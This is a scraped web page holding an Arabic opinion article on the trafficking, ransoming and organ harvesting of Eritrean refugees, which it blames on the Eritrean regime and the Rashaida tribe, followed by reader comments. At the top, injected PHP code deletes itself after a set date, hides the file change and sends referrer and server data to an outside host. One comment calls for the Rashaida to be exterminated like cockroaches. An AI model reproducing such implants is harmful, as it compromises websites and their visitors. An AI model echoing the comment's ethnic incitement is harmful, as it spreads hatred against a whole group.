check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } تراجيديا ... يسمونها تجارة البشر
кремлевская диета

تراجيديا ... يسمونها تجارة البشر

User Rating: / 0
PoorBest 

 

 

 

 

 

 

تراجيديا   ...  يسمونها تجارة البشر

حمد كل  17 مارس 2013م

                 تجارة البشر هي كتجارة الرقيق او العبيد لكنها اخذت اسما عصريا فسموها تجارة البشر

     الشعوب هي كالارض اذا لم تجد مظلة ممثله في دولة تحميها تتعرى كما تتعرض الارض الى الجدب والجفاف والتصحر حين تغادرها السحب الممطرة.

    ان المهانة التي لحقت بالشعب الارتري في زمان حكم (اسياس افورقي) لم يشهد مثيل لها  في زمن استعمار الطليان، الانجليز او الاثيوبين. اصبح الانسان الارتري رخيصا مهانا ، اصبح سلعة في يد السماسرة وعصابات الاتجار بالبشر ثم تدحرج به الامر فاصبح يذبح كالشاة لتباع اجزاء من جسمه ، ومخابرات اسياس وعسكره شريك في هذه الجريمة النكراء.

      ما يثير استغرابنا تلك التصريحات والمقالات التي تتحدث وتتهم الرشايدة وبعض من الاجهزة الامنية السودانية في كسلا وسماسرة اخرين منهم ارترين دون ان تتناول هذه التصريحات والمقالات من المتسبب الاصلي في هذه الجريمة.

      ان تناول هذه الجريمة من جذورها والمتسبب فيها هو الذي يوصلنا للحقيقة، والسؤال من المتسبب في الاصل في هذه الماساة؟

    من اين جاءت هذه المشكلة بالدرجة الاولي:-

     1  ليست هناك دولة بالشكل المتعارف عليه دوليا في ارتريا، ليس هناك دستور، ليس هناك ديمقراطية، ليس هناك مؤسسات دولة، ليس هناك قانونا يحمي الانسان الارتري ويحفظ حقوقه، ليس هناك عدل ولا مساواة، هناك عصابة تتحكم في رقاب الناس

2   هناك نظام دكتاتوري قمعي كمم افواه الناس، والتهمت السجون كل من يشك في امره دون محاكمات منذ بدأ الاستقلال.

3   حاكم ارتريا اطلق العنان لاجهزة المخابرات والامن لتحصي انفاس الناس

4   ازمة اقتصادية طاحنة واقفلت ابواب الارزاق امام الانسان الارتري

5   خدمة وطنية اجبارية بلا زمن محدد ، يخدم فيها الشباب في المشاريع الوهمية للنظام دون اجر ويضيع شبابه هدرا، وهي نوع من السخرة، وهي ايضا نوع متستر بالشعارات لتجارة البشر.

     كل هذه الاسباب وغيرها جعلت من ارتريا بلدا طاردا وكان الهروب .

   تجارة البشر او تجارة الرقيق قديمة كقدم تاريخها واحداثها. يحكي لنا الاجداد والاباء ان (الرشايدة) كانوا يختطفون الاطفال ويبعونهم في الدول العربية المجاورة، والامهات قديما كن يحذرن اطفالهن من الرشايدة ، شهدت مدينة (اغردات) في نهايات الاربعينات وبداية الخمسينات عدد من الرجال جاؤا من تلك البلاد العربية يبحثون عن اصولهم وذويهم وربما حدث ذلك في مدن ارترية اخرى.

     في نهايات الاربعينات والخمسينات ايضا كان الرشايدة ينهبون الابل والابقار من منطقة بركة والقاش ويدخلون بها الي السودان ويتجهون بها عن طريق (درب الاربعين) لتباع في مصر. وكان الرشايدة ياتون وهم مسلحين، واثناء عملية النهب والسلب اما ان يقتلوا الرعاة الارتريين او يصيبونهم اصابات بالغة.

     مع اندلاع الثورة بقيادة جبهة التحرير الارترية خفت عملية النهب ، لكنهم وعلى غفلة بين فترات متباعدة كان يتم السلب والنهب الى ان جاء لا ادري ان كان ذلك في عام 1973 او 1974 حيث قام شباب من منطقة القاش وبركا واستولوا على ما يقدر باربعين ناقة من الرشايدة وتوغلوا بها داخل الاراضي الارترية الى منطقة ( شندشنا)، هذه العملية اصابة الرشايدة بنوع من الهلع وتجمع وجهائهم من اماكن متفرغة والتقوا بقيادة جبهة التحرير الارترية ، قيادة جبهة الحرير الارترية  شرحت لهم تاريخ ابنائهم المخزي وطلبت منهم تعهدا بعدم الاعتداء ويقاف عمليات السلب والنهب، وبالفعل تعهدوا بذلك وعادت لهم جميع نياقهم.

        في فترات لاحقة وكلما تسنح لهم فرصة يعتدون على مستودعات اسلحة الثورة، كان ذلك يحدث بين فترة واخري.

      الرشايدة الذين عاشوا في ارتريا وخاصة في الشمال والشمال الشرقي من ارتريا لم يمارسوا أي عمل وطني يذكر ولم يلتحقوا بالثورة بل كانوا يطلقون عليها ( حكومة العجمان بيننا وبينهم الظلام)، انهم يعيشون في ارتريا كالغرباء، لكن الجبهة الشعبية لشيئ لا نعرفه منحتهم القومية التاسعة وطبعت صورهم في العملة التي يسمونها (نقفة) .

        الرشايدة قبائل لا وطن لهم ، هم بدو رحل ينتقلون على رأس الحدود بين ارتريا والسودان ، هم مجتمع انعزالي لا يختلطون مع الشعوب التي يعيشون معها ، لكنهم في الفترات الاخيرة اصبحوا يتاجرون بالنياق مع دول الخليج ويشارك ابناءهم في سباقات الهجن بدول الخليج، وبدأ وضعهم الاقتصادي يتحسن ، وبدا البعض منهم يستقر في المنطقة الجنوبية لمدينة كسلا واقاموا قريتين سموها ( مستورة) و ( منصورة).

      مع مجئ الاستقلال ارتبطوا بالجبهة الشعبية واصبحوا اداة من ادوات مخابراتهم، مع احتضان حكومة الشعبية للمعارضة السودانية اسس الرشايدة تنظيما سموه ب ( الاسود الحرة) وسلحتهم حكومة الشعبية ولانهم في الاصل من محترفي عمليات التهريب فقد استفادوا كثيرا ماديا ولان حكومة الشعبية مستفيدة من خدماتهم فقد سمحت لهم بتوريد البضائع من (دبى) عبر ميناء مصوع، وتخزن تلك البضائع في الحدود لتهرب الى داخل السودان، ومن السودان كانوا يهربون كل انواع المحروقات وغيرها في سوق اقاموه داخل مدينة تسنى.

         في فترة القتال مع اثيوبيا كلفوا بعدة مهام سرية وقتالية لدعم حكومة الشعبية، ومن اشهر العمليات التي قام بها تنظيم (الاسود الحرة) تفجير انبوب البترول عدة مرات المتجه الى بورتسودان ،

وأنجزوا مهمات سرية عديدة داخل الاراضي والمدن السودانية والتي من شأنها خدمة مخططات مخابرات الشعبية.

         مع اقامة منطقة العمليات العسكرية الحدودية التى كان يقودها العميد (تخلى منجوس) ارتبط به مهامهم وازدادت عمليات التهريب من والى السودان وذلك لتغطية نفقات عسكر منطقة العمليات العسكرية الحدودية وأجهزة المخابرات والأمن في المنطقة ، بالإضافة الى انهم بالتنسيق مع المخابرات الارترية كانوا يختطفون كل من كان مطلوبا وهاربا من داخل الاراضي السودانية.

            كيف بدأت تجارة البشر ؟

   بداية يمكن القول ان تستخدم بشرا لسنين طويلة تحت بند الخدمة الوطنية دون اجر يعتبر نوع من السخرة ، ويندرج في بند تجارة البشر

    اى شاب ارتري هرب من الخدمة الوطنية كانت حكومة الشعبية تلزم اسرته بدفع خمسين الف نقفة

     قبل الحرب مع اثيوبيا وبعدها اشتدت محاصرة الشباب ومنعهم من السفر بل وصل الامر ان اى طفل تجاوز عمره  خمس سنوات كان يمنع من السفر مع ذويه ، وهنا ظهر شيئ كان في البدء سريا ، فكل من يحاول ان يهرب ابنه ، اخاه ، شقيقته او قريبه كان يدفع لبعض الضباط مبلغ 4 الف دولار امريكي تسلم نقدا ويتم تسفيره ويصل سالما الى ( كسلا)

      ومع حالة العزلة الدولية والأزمات الاقتصادية التي يعاني منها النظام الارتري ، وعجزه من ايقاف عمليات الهروب التي تتم بشكل كبير ، وحاجة تغطية نفقات جيشه ومخابراته وأمنه اكتشف النظام ان عملية ابتزاز الهارب او اللاجئ في السودان تدر مبالغ طائلة ، فتم ايعاز المخابرات والأمن وعلى رأسهم منطقة العمليات العسكرية الحدودية بقيادة العميد تخلى منجوس وبالتنسيق مع الرشايدة ممارسة هذا الابتزاز ، لكننا يمكن القول قبل هذا القرار ومنذ تعيين العميد تخلى منجوس قائدا لتلك القوات يقال ان هذا الرجل جنى مبالغ طائلة بصورة شخصية بالمناصفة مع الرشايدة.

       في مرحلة لاحقة وجدنا ان الارتري او الارترية الذين وصلوا سالمين الى معسكرات اللاجئين يتم اختطافهم بواسطة اجهزة الامن الارترية بارشاد من الرشايدة وبالتالي تحولت قريتي ( مستورة) و (منصورة) وكرا لسجن اللاجئ ولن يخرج منها ألا اذا دفعت اسرته في داخل ارتريا او من الخارج فدية تقدر ب 10 الف دولار والا يتم اعادته الى ارتريا ليواجه قدره.

      وجاءت اغراءات اخرى حيث يطلب من اللاجئ مبلغا لإيصاله الى (سيناء) ومنها للدخول الى (اسرائيل) ويسلم هذا اللاجئ لعصابات اخرى في سيناء لتطلب منه ايضا مبالغ اخرى لإدخاله الى اسرائيل واذا لم يدفع فان الموت مصيره.

    ولان هذه العمليات توسعت وأصبحت تدر مبالغ ضخمة ، ولان ايضا المخابرات الارترية حتى لا تظهر بصماتها بصورة مكشوفة ويكون ضدها مستمسك شكلت عصابات منظمة وسماسرة بكسلا وفي الخرطوم في حي الجريف والسويد وسيناء بالتنسيق مع الرشايدة ، ثم تطور الامر الى شئ اخطر حيث بدأت التجارة بأجزاء من البشر شارك في هذه المنظمة بعض من الاطباء ، ليذبح اللاجئ وتباع اجزاءه البشرية .

      ان معانات اللاجئ الارتري لا تستطيع هذه المقالة ان تسردها بشكل تفصيلي ولا تحصر اللجؤ في السودان فقط لكننا يمكن ان نتناول جزء من معانات اللاجئ وهو هارب بالقوارب في عرض البحر الاحمر ، كم هم الذين انقلب بهم القارب المشحون بالبشر اكثر من طاقته فالتهمتهم الاسماك ، كم لاجئ مات في الصحراء وهو متجه الى ليبيا ، كم لاجئ مات في عرض البحر الابيض المتوسط وهو يبحر من ليبيا الى سواحل ايطاليا ، كم لاجئ مات وهو مكدس في ( الكونتينرات) وهو متجه الى بعض البلدان الاوربية من فرنسا.

     يبدو ان عام 2013 بدأ يصحو فيه ضمير العالم وان جاء متأخرا تجاه ماسات الانسان الارتري او اللاجئ الارتري ، ولان عملية اختطاف الانسان الارتري تجاوزتها العصابات فبدأت تختطف حتى من ابناء السودان.

      ففي السودان هناك اعترافات قضائية لأحد متهمي الاتجار بالبشر وتورط افراد من القوات النظامية السودانية ، وبدأ السودان يتجه لاستخدام نيابة متخصصة لجرائم الاتجار بالبشر كما عقدت بمدينة كسلا يوم 10 مارس 2013 ورشة عمل للمطالبة بتامين معسكرات اللاجئين صاحب ذلك احتجاج وجهاء القبائل بنفس المدينة ، وكشف البرلمان السوداني عن اتجاه لإيداع مشروع قانون لمكافحة الاتجار بالبشر بمبادرة من جهاز شئون المقتربين للحد من ظاهرة تفشى الاتجار بالبشر ، والسفارة الامريكية بالخرطوم تستفسر البرلمان السوداني حول الاتجار بالبشر ، والسفير البريطاني بالخرطوم يزور معسكر (الشجراب).

   كما لاحظنا تفاعل المجتمع الدولي وجمعيات حقوق الانسان الارترية بهذا الموضوع كما ان قناة الحوار خصصت حلقتين لهذا الغرض.

     والسؤال هنا من هو المتسبب الاول في هذه المأساة الانسانية ؟

      ان الدول المجاورة قد تعتقل عصابات الاتجار بالبشر وتحاكمهم لكن المجتمع الدولي مطالب بمحاكمة رأس النظام الارتري في محكمة دولية لأنه المتسبب الاول والأساسي لهذه الجرائم التي وقعت على الانسان الارتري.

     ان التبرير الذي قدمه حاكم ارتريا تجاه مسألة تجارة البشر لا تبرأه ولا تعفيه من الجريمة هو وأجهزة مخابراته ومعهم ذاك المجرم القاتل العميد تخلي منجوس.


Comments 

  1. #2 simon
    2013-03-2915:03:05 I read your article mr .hamid kulu by arabic language about the problemes the are masucred in sinai the first risponsabiliy [censored] this
    things is the regime [censored] eritrea. this man is evil. he will destroy the
    eritrean .we if dont find any solution . may after some years there
    it will be dificult
  2. #1 إبن أبيه
    2013-03-2200:09:42 يا رشايدة يا عرق الخسة و الدنائة جرائمكم لا تنسى و لن تنسى أبداّ شدّو الرحال أو ستبادون كالصراصير

Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player

عمود الكتاب العربي

Arkokabay.com
Arkokabay.com
OMAR JABIR الأستاذ عمر جابر
OMAR JABIR الأستاذ عمر جابر
Zein Shokayالأستاذ زين شوكاي
Zein Shokayالأستاذ زين شوكاي
سعادة السفير حمد كلُ
سعادة السفير حمد كلُ
الأستاذ صلاح أبوراي
الأستاذ صلاح أبوراي
 الأستاذة حنان
الأستاذة حنان
الأستاذ موسى ضرار
الأستاذ موسى ضرار
الأستاذ أبو الرشيد
الأستاذ أبو الرشيد
الأستاذ عبدالفتاح ود الخليفة
الأستاذ عبدالفتاح ود الخليفة
الأستاذ ياسين محمد عبدالله
الأستاذ ياسين محمد عبدالله
الأستاذ محمد نور - بركان
الأستاذ محمد نور - بركان
الأستاذ جمال همد
الأستاذ جمال همد
الأستاذ فكاك ناير
الأستاذ فكاك ناير
الأستاذ أحمد صلاح الدين
الأستاذ أحمد صلاح الدين
Amal Ali الأستاذة أمال علي
Amal Ali الأستاذة أمال علي
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
الأستاذ حسن سلمان
الأستاذ حسن سلمان
الأستاذة منى محمد صالح
الأستاذة منى محمد صالح
الاستاذة نوره فارس
الاستاذة نوره فارس